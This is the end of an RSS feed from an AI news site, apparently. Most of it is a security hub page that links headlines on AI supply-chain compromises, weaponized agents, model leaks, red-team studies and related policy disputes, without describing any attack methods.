<li><a href="https://www.assemblyai.com/blog/assemblyai-vs-deepgram">AssemblyAI vs Deepgram Accuracy Comparison</a> - Head-to-head accuracy analysis</li>
<li><a href="https://cloud.google.com/speech-to-text/pricing">Google Cloud Speech-to-Text Pricing</a> - Standard and enhanced model rates</li>
</ul>
]]></content:encoded><dc:creator>James Kowalski</dc:creator><category>Tools</category><media:content url="https://awesomeagents.ai/images/tools/best-ai-transcription-tools-2026_hu_798b7a991e9de82b.jpg" medium="image" width="1200" height="675"/><media:thumbnail url="https://awesomeagents.ai/images/tools/best-ai-transcription-tools-2026_hu_798b7a991e9de82b.jpg" width="1200" height="675"/></item><item><title>AI Security Research and Incident Coverage</title><link>https://awesomeagents.ai/security/</link><pubDate>Fri, 17 Apr 2026 13:16:34 +0200</pubDate><guid>https://awesomeagents.ai/security/</guid><description>&lt;p>AI systems are now part of critical infrastructure, and the attack surface has grown with them. Models leak training data, agents get weaponized into command-and-control channels, and every new SDK is a supply-chain hop waiting for a backdoored release. This hub tracks what we cover: the incidents, the research, and the patterns that keep repeating.&lt;/p></description><content:encoded xmlns:content="http://purl.org/rss/1.0/modules/content/"><![CDATA[<p>AI systems are now part of critical infrastructure, and the attack surface has grown with them. Models leak training data, agents get weaponized into command-and-control channels, and every new SDK is a supply-chain hop waiting for a backdoored release. This hub tracks what we cover: the incidents, the research, and the patterns that keep repeating.</p>
<p>We cover AI security the way the industry actually experiences it - from the CVE to the aftermath. No vendor press releases, no theoretical threat models padded for word count. If a real compromise happened, we report it. If a paper describes a reproducible exploit, we read it and write about whether it matters.</p>
<h2 id="supply-chain-and-sdk-compromises">Supply-chain and SDK compromises</h2>
<p>SDKs and orchestration layers are where attackers reach the most keys per kilobyte of malicious code. Our most-read story of 2026 was a supply-chain compromise in a widely deployed LLM router, and the pattern has kept repeating.</p>
<ul>
<li><a href="/news/litellm-supply-chain-compromise-credential-theft/">LiteLLM supply-chain compromise drains developer credentials</a></li>
<li><a href="/news/llm-router-agent-supply-chain-attack/">LLM router agent supply-chain attack</a></li>
<li><a href="/news/roguepilot-github-copilot-supply-chain-attack/">RoguePilot: GitHub Copilot extension supply-chain attack</a></li>
<li><a href="/news/claude-code-npm-leak-claw-code-github-record/">Claude Code npm leak and &quot;Claw-Code&quot; GitHub record</a></li>
<li><a href="/news/hackerbot-claw-trivy-github-actions-compromise/">HackerBot: Claw, Trivy, and the GitHub Actions compromise</a></li>
</ul>
<p>Full catalog: <a href="/tags/supply-chain-attack/">/tags/supply-chain-attack/</a></p>
<h2 id="agents-and-assistants-weaponized">Agents and assistants weaponized</h2>
<p>When the attacker can use the same models you do, defender asymmetry goes to zero. We cover both sides - offensive research on agents that run exploits and defensive coverage of products meant to stop them.</p>
<ul>
<li><a href="/news/ai-assistants-weaponized-c2-proxies/">AI assistants weaponized as C2 proxies</a></li>
<li><a href="/news/ai-powered-cybercrime-fortigate-arxon-mcp/">Single operator uses DeepSeek and Claude to breach 600 FortiGate firewalls</a></li>
<li><a href="/news/kali-linux-claude-api-pentest-data-security/">Kali Linux integrates Claude for automated pentesting</a></li>
<li><a href="/news/bugtraceai-apex-26b-local-red-team-model/">BugTraceAI Apex: red-team LLM fits on a single RTX 3060</a></li>
<li><a href="/news/ai-hacker-600-fortinet-firewalls-breached/">AI hacker breaches 600 Fortinet firewalls in 5 weeks</a></li>
</ul>
<h2 id="model-vulnerabilities-and-data-leaks">Model vulnerabilities and data leaks</h2>
<p>Training-data extraction, jailbreaks that scale, and cloud misconfigurations that expose unreleased models.</p>
<ul>
<li><a href="/news/anthropic-mythos-capybara-leak/">Anthropic's Mythos model exposed via CMS misconfiguration</a></li>
<li><a href="/news/anthropic-claude-mythos-leaked-cybersecurity-risks/">Anthropic leak reveals Claude Mythos and cybersecurity risks</a></li>
<li><a href="/news/gemini-cli-x-account-hacked-cli-token-scam/">Gemini CLI X account hacked in CLI token scam</a></li>
<li><a href="/news/github-llm-malware-repos-software-zip/">GitHub LLM malware repositories</a></li>
<li><a href="/news/anthropic-distillation-attacks-deepseek-moonshot-minimax/">Anthropic says DeepSeek and Moonshot ran 24,000 fake accounts to steal Claude's capabilities</a></li>
</ul>
<h2 id="benchmarks-red-teams-and-disclosure">Benchmarks, red teams, and disclosure</h2>
<p>The security research side - what can actually be measured, where the public benchmarks fail, and how responsible disclosure plays out for AI systems.</p>
<ul>
<li><a href="/news/berkeley-agent-benchmarks-exploitable/">Every major AI agent benchmark can be hacked</a></li>
<li><a href="/news/agents-of-chaos-stanford-harvard-ai-agent-red-team/">Stanford-Harvard AI agent red team study</a></li>
<li><a href="/news/anthropic-project-glasswing-100m-cybersecurity/">Anthropic ships $100M AI cyber defense to 12 rivals</a></li>
<li><a href="/news/claude-code-auto-mode-agentic-safety/">Claude Code auto mode and agentic safety</a></li>
<li><a href="/news/linux-foundation-12m-ai-bug-slop/">Linux Foundation $12M to fight AI bug slop</a></li>
</ul>
<h2 id="policy-procurement-and-national-security">Policy, procurement, and national security</h2>
<p>Who is allowed to sell AI to whom, and what the government does when it decides something is a supply-chain risk.</p>
<ul>
<li><a href="/news/anthropic-sues-pentagon-blacklist/">Anthropic sues Pentagon over supply-chain blacklist</a></li>
<li><a href="/news/anthropic-wins-injunction-pentagon-ban/">Anthropic wins injunction against Pentagon ban</a></li>
<li><a href="/news/pentagon-formally-designates-anthropic-supply-chain-risk/">Pentagon formally designates Anthropic a supply-chain risk</a></li>
<li><a href="/news/google-openai-employees-letter-military-ai-limits/">Google and OpenAI employees letter limiting military AI</a></li>
<li><a href="/news/nist-ai-agent-standards-initiative/">NIST AI agent standards initiative</a></li>
</ul>
<h2 id="related-coverage">Related coverage</h2>
<p>Full catalogs are auto-updated on the tag pages:</p>
<ul>
<li><a href="/tags/security/">Security</a> - all security-adjacent coverage</li>
<li><a href="/tags/cybersecurity/">Cybersecurity</a> - attacks, defenses, threat intel</li>
<li><a href="/tags/supply-chain-attack/">Supply Chain Attack</a> - compromised packages, SDKs, agents</li>
<li><a href="/tags/ai-safety/">AI Safety</a> - alignment, oversight, red-team research</li>
<li><a href="/tags/vulnerabilities/">Vulnerabilities</a> - specific CVEs and disclosure stories</li>
<li><a href="/tags/prompt-injection/">Prompt Injection</a> - input-layer attacks</li>
</ul>
<h2 id="why-we-cover-this">Why we cover this</h2>
<p>Two things separate useful AI-security coverage from the noise. First, a beat editor who reads CVEs, research papers, and vendor advisories before the PR cycle picks them up. Second, reporting that does not flinch when the story implicates a lab we also cover favorably elsewhere. If we write about a new Claude release on a Tuesday and Anthropic ships a supply-chain miss on a Wednesday, you will read about both.</p>
<p>This page is the front door. For the firehose, see the <a href="/tags/security/">tag pages</a> above, or subscribe to the <a href="/">Awesome Agents</a> daily brief to get security stories as they happen.</p>
]]></content:encoded><dc:creator>Elena Marchetti</dc:creator><category>News</category><media:content url="https://awesomeagents.ai/images/security-hub_hu_af0fb06979a00250.jpg" medium="image" width="1200" height="675"/><media:thumbnail url="https://awesomeagents.ai/images/security-hub_hu_af0fb06979a00250.jpg" width="1200" height="675"/></item></channel></rss>